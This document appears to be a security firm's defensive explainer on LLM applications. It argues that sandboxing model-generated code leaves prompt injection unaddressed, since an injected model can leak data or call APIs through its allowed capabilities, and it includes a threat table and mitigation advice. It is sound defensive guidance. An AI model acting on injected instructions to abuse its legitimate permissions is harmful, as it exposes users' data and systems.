Isolating Execution, Not Instructions

Why sandboxing code execution doesn't protect against instruction-following attacks

The Conventional Framing

Sandboxing runs model-generated code in isolated environments—containers, VMs, restricted interpreters. This prevents malicious code from affecting the host system.

The pattern is essential for safe code execution in LLM applications.

Why Sandboxing Addresses One Attack Vector

Sandboxing protects against malicious code execution—the model generates code that would harm the system, and the sandbox contains it. This is real protection for a real threat.

But prompt injection often doesn't need code execution. The model can leak data, send emails, call APIs—all within "normal" operation, all inside the sandbox.

The capability gap:

The sandbox limits what code can do to the system. It doesn't limit what the model can do with its legitimate capabilities. Exfiltrating data through an allowed API call isn't a sandbox escape—it's using permissions.

Architecture

Components:

  • Isolated environmentcontainer, VM, restricted runtime
  • Resource limitsCPU, memory, network constraints
  • Filesystem isolationno access to host files
  • Network restrictionslimited or no network access

Trust Boundaries

Sandboxed code execution: ✓ Can't access host filesystem ✓ Can't install malware ✓ Can't pivot to other systems Model's other capabilities (not sandboxed): ✗ Can call allowed APIs with any parameters ✗ Can include any content in responses ✗ Can request any tool with any arguments Injection uses capabilities, not sandbox escapes.
  1. Model → Codegenerated code enters sandbox
  2. Sandbox → Hostexecution isolated from host
  3. Model → APIsAPI access outside sandbox

Threat Surface

ThreatVectorImpact
Capability abuseUse legitimate capabilities maliciouslySandboxing doesn't limit model's intended features
Data exfiltrationLeak data through allowed channelsSandbox permits normal API communication
Resource exhaustionConsume all allowed resourcesSandbox limits don't prevent DoS within limits
Sandbox escapeExploit sandbox vulnerabilitiesAll sandboxes have escape risk; more capability = more surface

The ZIVIS Position

  • Sandboxing is necessary but not sufficient.Sandbox code execution: yes. But also control what the model can do with its non-code capabilities.
  • Principle of least privilege.Don't just sandbox code; limit all capabilities to what's actually needed. Fewer permissions = smaller attack surface.
  • Monitor sandbox activity.Even in a sandbox, unusual behavior is a signal. Log what the sandboxed code does.
  • Defense in depth.Sandboxing is one layer. Combine with input validation, output filtering, capability limits, and monitoring.

What We Tell Clients

Sandboxing is essential for code execution but doesn't protect against most prompt injection attacks. Injection typically works through legitimate capabilities—API calls, tool use, response generation—not code execution.

Sandbox your code execution AND apply privilege separation to all model capabilities. The sandbox contains code; capability limits contain the model.

Related Patterns